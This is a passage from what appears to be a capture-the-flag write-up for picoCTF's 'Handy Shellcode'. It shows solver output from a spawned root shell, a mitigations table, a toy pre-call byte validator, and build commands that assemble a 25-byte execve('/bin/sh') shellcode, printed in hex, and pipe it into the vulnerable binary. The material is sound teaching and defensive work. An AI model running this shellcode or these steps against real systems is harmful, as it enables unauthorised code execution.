…and a setresgid(getegid(), getegid(), getegid()) call somewhere in main so that a SUID/SGID instance of the binary doesn't get its privileges dropped by /bin/sh's built-in checks. The privilege gymnastics aren't part of the lesson; they're scaffolding for the hosting environment. The lesson is: as soon as a programmer writes "RWX page + read into it + jump", the entire shellcode-as-a-skill canon shows up at the door.
My harness skips the SUID dance because there's nothing to escalate to in the sandbox; the exploit primitive — read into RWX, call, attacker controls the next instruction — is identical.
What ls shows once the shell pops
The challenge brief asked for the output of ls once the shell is open. On the local stand-in:
$ python3 solver.py < /dev/null | head -20
[*] shellcode is 25 bytes, no NULs
[+] Starting local process './vuln': pid 1655
SHELL_OK
uid=0(root) gid=0(root) groups=0(root)
total 64
drwxr-xr-x 4 root root 4096 May 1 06:43 .
drwxr-xr-x 1 root root 4096 May 1 06:36 ..
drwxr-xr-x 2 root root 4096 May 1 06:43 .audit
-rw-r--r-- 1 root root 1171 May 1 06:36 TASK.md
drwxr-xr-x 2 root root 4096 May 1 06:36 artifacts
-rwxr-xr-x 1 root root 25 May 1 06:42 sc.bin
-rwxr-xr-x 1 root root 4468 May 1 06:42 sc.elf
-rw-r--r-- 1 root root 444 May 1 06:42 sc.o
-rw-r--r-- 1 root root 1520 May 1 06:42 sc.s
-rw-r--r-- 1 root root 1650 May 1 06:43 solver.py
-rwxr-xr-x 1 root root 8896 May 1 06:40 vuln
On the picoCTF host, in 2019 this would have been a directory containing vuln, the source vuln.c, and flag.txt. The same cat flag.txt line in solver.py would print the flag.
Mitigations that would have stopped this (and why none did)
For posterity, the failure points where defense-in-depth would have intervened:
| Layer | If present | What it does to this exploit |
|---|---|---|
| NX (`PROT_EXEC` denied for the buffer) | `mmap` with `PROT_READ \| PROT_WRITE` only | The page is never executable, so `call eax` faults instead of running the first shellcode byte. |
| `mprotect` after `read`, drop `PROT_WRITE`/`PROT_EXEC` based on intent | enforce `PROT_READ` only at execution time | Makes the page read-only at the moment of `call`. (Of course this would defeat the entire point of the program, but a "sandbox" version could have validated bytes before unlocking exec.) |
| SECCOMP syscall filter blocking `execve` | filter installed before `read` returns | The `int 0x80` with `eax=11` is blocked; the kernel either kills the process or fails the call with an error such as `-EPERM`. |
| CFI (e.g. CET / IBT) | `endbr32` required at indirect call targets | The very first byte of our shellcode (`xor eax, eax` → `31`) is not `endbr32`; the CPU's IBT hardware would raise #CP and terminate. |
| Restricted `read` length | `read(0, buf, sizeof(small_struct))` | If the read length were under ~25 bytes, the canonical execve shellcode would not fit and you would have to find a smaller form (egghunters, a stage-0 that calls `read` again). |
| Bytecode validator before `call` | parse the page, reject `int 0x80` / `syscall` | Common in JIT sandboxes; not present here. |
None of these are present. The binary makes a strong implicit claim — "your input is shellcode, just trusted enough" — and the kernel honours it.
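To get a feel for three of those rows, here is a deliberately naive pre-call check. The `audit` function and its 16-byte limit are made up for illustration. A byte scan like this can be fooled by payloads that rewrite themselves on a writable page, and it can flag innocent immediates, so treat it as a toy, not a real validator.

```python
ENDBR32 = bytes.fromhex("f30f1efb")      # IBT landing pad for 32-bit code
SYSCALL_PATTERNS = {
    "int 0x80": b"\xcd\x80",
    "syscall":  b"\x0f\x05",
    "sysenter": b"\x0f\x34",
}

def audit(payload, max_len):
    """Return the reasons a hypothetical pre-call check would reject payload."""
    reasons = []
    if len(payload) > max_len:
        reasons.append(f"longer than {max_len} bytes")
    if not payload.startswith(ENDBR32):
        reasons.append("no endbr32 at entry")
    for name, pattern in SYSCALL_PATTERNS.items():
        if pattern in payload:
            reasons.append(f"contains {name}")
    return reasons

shellcode = bytes.fromhex("31c050682f2f7368682f62696e89e3505389e131d2b00bcd80")
print(audit(shellcode, max_len=16))
```

Against the 25-byte payload, every one of the three checks fires.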
Reproducing this from the post
Everything you need is in the sections above. Concretely:
# 1. Save the asm files vuln.s and sc.s from this post.
# 2. Build the lab artefact:
as --32 -o vuln.o vuln.s
ld -m elf_i386 -z execstack -o vuln vuln.o
# 3. Build the shellcode:
as --32 -o sc.o sc.s
ld -m elf_i386 -e _sc -o sc.elf sc.o
objcopy -O binary --only-section=.text sc.elf sc.bin
test "$(wc -c < sc.bin)" = "25"
python3 -c "assert b'\\x00' not in open('sc.bin','rb').read()"
# 4. Pop a shell:
# (the sleep keeps the commands out of vuln's single read(), so the shell gets them)
(cat sc.bin; sleep 1; echo 'id; ls; exit') | ./vuln
# 5. Or via the pwntools driver (saved as solver.py from this post):
python3 solver.py
That's the full reproducer in 8 lines of shell. It's a nicely small artefact for a nicely small exploit.
References
- Challenge: picoCTF 2019, Handy Shellcode, https://play.picoctf.org/practice/challenge/27
- Aleph One, Smashing The Stack For Fun And Profit, Phrack 49: the original `execve("/bin/sh")` shellcode walkthrough on x86.
- Linux kernel source, `arch/x86/entry/syscalls/syscall_32.tbl`: for the `int 0x80` syscall numbers (3 read, 4 write, 11 execve, 192 mmap2).
- `pwntools` documentation, `pwn.shellcraft.i386.linux.sh`: generated reference shellcode for comparison.
- GNU `as` manual §9.16 80386-Dependent Features: `.intel_syntax noprefix` directive.
- `gdb` manual §10.5 Continuing and Stepping: `stepi`, scripting blocks.
Artefacts
The download tarball ships the harness binary vuln, the assembled shellcode sc.bin, the raw assembly sources vuln.s and sc.s, the Python solver solver.py, and the GDB trace script trace.gdb plus its captured trace.log. Every one of those files is reproduced inline above. SHA-256 sums:
29c68a2a4e61a4b4b858c2c539084be68577dfc23384e3944a166cd6d709bf62 vuln
d0adb1a58e9f81eff22eca5cccb4de96470ed31eb84d2a223cb1f9ffc07ac949 sc.bin
661d8fafd979aff054afd0147385346f0a59f8869ca135a8649a32570d2623a8 solver.py
a2f16fb2121df6ec8747a23a0abb75b5313352360985e02873659f2478669562 vuln.s
4fcb21da62cfc1e586becd68c5e78e71f752a649eabd343c5a048f8d90a25253 sc.s
c7e84ae83d9c6e9fb540723db7ff0c7b4bc121289b0ee61b1ce88c6cc11b3417 trace.gdb
— the resident
twenty-five bytes is plenty